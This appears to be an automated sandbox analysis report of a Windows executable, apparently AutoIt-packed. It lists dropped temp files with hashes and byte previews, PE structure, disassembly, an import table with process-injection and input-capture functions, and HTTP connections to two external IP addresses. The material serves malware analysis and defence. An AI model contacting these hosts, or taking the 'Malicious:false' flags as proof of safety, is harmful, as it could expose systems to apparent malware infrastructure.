                                                    Process:C:\Users\user\Desktop\opp46lGmxd.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):270848
                                                    Entropy (8bit):7.99287317318546
                                                    Encrypted:true
                                                    SSDEEP:6144:ITGD6HllfZulE7NLFCbLPSqT7S2ACNFSqyFl5BipJB:ITGGF5Ml6NLFeFTrSl5Bip
                                                    MD5:CB375F8CD37172F4353C8DA688508CF7
                                                    SHA1:A515F2A7F10CD992685313054EA05339AC484408
                                                    SHA-256:EA59B47E1D041B58B06A03D1567E736B7ABFD7118106C432AB484934824494D8
                                                    SHA-512:BB0548D1836750526A5C3EEFE0B769C07D96C47245010A856E630249874289EE06CBACFCF607FF2CA2C9AB9634CBF6D815D3ED3F419F557479A8B063A93AFF4E
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..|..IJH7...C...s.JK....IX...OIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH.CD3DO.7E.@.i.B..k.9P6o98'P1%^j30W+ =j*Rc6F$p8We...hZ, Vd]\3aOIJH7CDJKY..%(.w(P.yS-.K..s*/.Y.l1^.U...##..92Qx/..H7CD3JPQi.OI.I6C.[..Q9EOIJH7.D1K[P2EOYNH7CD3JPQ9.ZIJH'CD3jTQ9E.IJX7CD1JPW9EOIJH7ED3JPQ9EOiNH7AD3JPQ9GO..H7SD3ZPQ9E_IJX7CD3JPA9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9k;,2<7CD.ETQ9UOIJX3CD#JPQ9EOIJH7CD3JpQ9%OIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3

                                                    C:\Users\user\AppData\Local\Temp\aut90CD.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\opp46lGmxd.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):9852
                                                    Entropy (8bit):7.5933700120283
                                                    Encrypted:false
                                                    SSDEEP:192:mS5jnkklrTefgLqJrwy/6Yyu2f82lIBK60aa5wzyeP6ebh+DLkEcEsXfQ4PTQhkT:VnI00wRW1oveP6e1+sBXfQ4hT
                                                    MD5:21AEAD0C8E4DF3EDBE9AA56F43FCEAFE
                                                    SHA1:F942F4B7A2A52E6D4FF8F3E7666227060667521A
                                                    SHA-256:80D131A472F15A407FCFD5D50F2B291E22FB8B49C6636595455D64D2B01A5D4C
                                                    SHA-512:C65FB526E0A44D311360D085DAEA4AF03159D213F7697F6009EED9D2F5DB3B0B8BE58649373A12BBF4822EEC3849D557D0236AB1488D94B29081CCBCEC5D2C6C
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:EA06..p*.P.tY..kD.L'....8.M.t*..o7.Q'.)..aC.P......0.Mf.....8..lv;..e0..&.i...8.X.....m6.Nf.Y...9.M@..d.!,3y.........e.6., ..%..a.X....-.q3...zs0.Nf`.].Y'3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^.8.N@.=7.z...#.$...`!..H&.>_L.p..............@|..6..(....ka..&...Xf@0........|.=..g...........`.A..b.......P.O.id...|.)....4....\.M.4.;...K..4|. F...e.f..s....id..p.....4....s`./.....X. ..%..K.;-.o8...k ..4..`w..qd..f`....l.....V0...lS..m4.Y.......>.5...S...f&.+..Af....<..f....gl`....g.d..#4.x..#1.X...cV....0..BV0.NL@.;1.X..e1.Y,S[(.#6.,.d.....f.I......B3p....;2.X.se.Y..@.Fn.....f`...J&.9.......!93.X...c6).$.6.....h`...@.....3f.Lg3I..h....l.Z.,.....[%.ec...`....,vj...%.sb.X.,...p.....f.....g ...!8.....c.`!......3d...l.2.,...g.K..i0...B.....@.....j.0..B...Fl.....f....X.I..P...@

                                                    C:\Users\user\AppData\Local\Temp\misrun

                                                    Download File
                                                    Process:C:\Users\user\Desktop\opp46lGmxd.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):270848
                                                    Entropy (8bit):7.99287317318546
                                                    Encrypted:true
                                                    SSDEEP:6144:ITGD6HllfZulE7NLFCbLPSqT7S2ACNFSqyFl5BipJB:ITGGF5Ml6NLFeFTrSl5Bip
                                                    MD5:CB375F8CD37172F4353C8DA688508CF7
                                                    SHA1:A515F2A7F10CD992685313054EA05339AC484408
                                                    SHA-256:EA59B47E1D041B58B06A03D1567E736B7ABFD7118106C432AB484934824494D8
                                                    SHA-512:BB0548D1836750526A5C3EEFE0B769C07D96C47245010A856E630249874289EE06CBACFCF607FF2CA2C9AB9634CBF6D815D3ED3F419F557479A8B063A93AFF4E
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..|..IJH7...C...s.JK....IX...OIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH.CD3DO.7E.@.i.B..k.9P6o98'P1%^j30W+ =j*Rc6F$p8We...hZ, Vd]\3aOIJH7CDJKY..%(.w(P.yS-.K..s*/.Y.l1^.U...##..92Qx/..H7CD3JPQi.OI.I6C.[..Q9EOIJH7.D1K[P2EOYNH7CD3JPQ9.ZIJH'CD3jTQ9E.IJX7CD1JPW9EOIJH7ED3JPQ9EOiNH7AD3JPQ9GO..H7SD3ZPQ9E_IJX7CD3JPA9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9k;,2<7CD.ETQ9UOIJX3CD#JPQ9EOIJH7CD3JpQ9%OIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3JPQ9EOIJH7CD3

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.109532074994351
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:opp46lGmxd.exe
                                                    File size:1'161'728 bytes
                                                    MD5:0f399d1b3a7c6dd28867095c2bdb2098
                                                    SHA1:ad22ee54a3f642a81ff9f48fbaba9af1f39c79b8
                                                    SHA256:a49d396f7f272b32af4ef12abb52d5bc92ff2c97ca09b1d79436e13f1b9bf192
                                                    SHA512:889e6e06eba7fcedfc0503203220073a8f1a07824185b859c93a4e107fdc347cf26e6424a58cd50d65c91959c5176471eaf050ca50d98cf265c91c94d38ecae6
                                                    SSDEEP:24576:2AHnh+eWsN3skA4RV1Hom2KXMmHaueZzqHFotR95eTQ5:Rh+ZkldoPK8YaueIoF
                                                    TLSH:5E35BD0273D2C036FFAB92739B6AF64156BC79254123852F13981DB9BD701B2263E763
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                    File Icon

                                                    Icon Hash:aaf3e3e3938382a0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x42800a
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66224BD0 [Fri Apr 19 10:47:44 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007F46D09F0A5Dh
                                                    jmp 00007F46D09E3814h
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    push edi
                                                    push esi
                                                    mov esi, dword ptr [esp+10h]
                                                    mov ecx, dword ptr [esp+14h]
                                                    mov edi, dword ptr [esp+0Ch]
                                                    mov eax, ecx
                                                    mov edx, ecx
                                                    add eax, esi
                                                    cmp edi, esi
                                                    jbe 00007F46D09E399Ah
                                                    cmp edi, eax
                                                    jc 00007F46D09E3CFEh
                                                    bt dword ptr [004C41FCh], 01h
                                                    jnc 00007F46D09E3999h
                                                    rep movsb
                                                    jmp 00007F46D09E3CACh
                                                    cmp ecx, 00000080h
                                                    jc 00007F46D09E3B64h
                                                    mov eax, edi
                                                    xor eax, esi
                                                    test eax, 0000000Fh
                                                    jne 00007F46D09E39A0h
                                                    bt dword ptr [004BF324h], 01h
                                                    jc 00007F46D09E3E70h
                                                    bt dword ptr [004C41FCh], 00000000h
                                                    jnc 00007F46D09E3B3Dh
                                                    test edi, 00000003h
                                                    jne 00007F46D09E3B4Eh
                                                    test esi, 00000003h
                                                    jne 00007F46D09E3B2Dh
                                                    bt edi, 02h
                                                    jnc 00007F46D09E399Fh
                                                    mov eax, dword ptr [esi]
                                                    sub ecx, 04h
                                                    lea esi, dword ptr [esi+04h]
                                                    mov dword ptr [edi], eax
                                                    lea edi, dword ptr [edi+04h]
                                                    bt edi, 03h
                                                    jnc 00007F46D09E39A3h
                                                    movq xmm1, qword ptr [esi]
                                                    sub ecx, 08h
                                                    lea esi, dword ptr [esi+08h]
                                                    movq qword ptr [edi], xmm1
                                                    lea edi, dword ptr [edi+08h]
                                                    test esi, 00000007h
                                                    je 00007F46D09E39F5h
                                                    bt esi, 03h

                                                    Rich Headers

                                                    Programming Language:
                                                    • [ASM] VS2013 build 21005
                                                    • [ C ] VS2013 build 21005
                                                    • [C++] VS2013 build 21005
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ASM] VS2013 UPD5 build 40629
                                                    • [RES] VS2013 build 21005
                                                    • [LNK] VS2013 UPD5 build 40629

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x513b8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x11a0000x7134.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0xc80000x513b80x51400cab5db91ce3130a1c19cd210f4a30c97False0.9195492788461539data7.874266521852538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x11a0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                    RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                    RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                    RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                    RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                    RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                    RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                    RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                    RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                    RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                    RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                    RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                                    RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                                    RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                                    RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                                    RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                    RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                    RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                                    RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                    RT_RCDATA0xd07b80x48650data1.0003406086440403
                                                    RT_GROUP_ICON0x118e080x76dataEnglishGreat Britain0.6610169491525424
                                                    RT_GROUP_ICON0x118e800x14dataEnglishGreat Britain1.25
                                                    RT_GROUP_ICON0x118e940x14dataEnglishGreat Britain1.15
                                                    RT_GROUP_ICON0x118ea80x14dataEnglishGreat Britain1.25
                                                    RT_VERSION0x118ebc0x10cdataEnglishGreat Britain0.5970149253731343
                                                    RT_MANIFEST0x118fc80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                    Imports

                                                    DLLImport
                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                    PSAPI.DLLGetProcessMemoryInfo
                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                    UxTheme.dllIsThemeActive
                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishGreat Britain

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jun 9, 2024 17:59:49.452542067 CEST4971180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 17:59:49.457829952 CEST8049711154.215.72.110192.168.2.11
                                                    Jun 9, 2024 17:59:49.457956076 CEST4971180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 17:59:49.461067915 CEST4971180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 17:59:49.465974092 CEST8049711154.215.72.110192.168.2.11
                                                    Jun 9, 2024 17:59:50.418404102 CEST8049711154.215.72.110192.168.2.11
                                                    Jun 9, 2024 17:59:50.460371971 CEST4971180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 17:59:50.600673914 CEST8049711154.215.72.110192.168.2.11
                                                    Jun 9, 2024 17:59:50.600982904 CEST4971180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 17:59:50.602484941 CEST4971180192.168.2.11154.215.72.110
                                                    Jun 9, 2024 17:59:50.607391119 CEST8049711154.215.72.110192.168.2.11
                                                    Jun 9, 2024 18:00:06.185020924 CEST4971280192.168.2.11202.172.28.202
                                                    Jun 9, 2024 18:00:06.189982891 CEST8049712202.172.28.202192.168.2.11
                                                    Jun 9, 2024 18:00:06.190092087 CEST4971280192.168.2.11202.172.28.202
                                                    Jun 9, 2024 18:00:06.192022085 CEST4971280192.168.2.11202.172.28.202
                                                    Jun 9, 2024 18:00:06.196938038 CEST8049712202.172.28.202192.168.2.11
                                                    Jun 9, 2024 18:00:07.068464994 CEST8049712202.172.28.202192.168.2.11
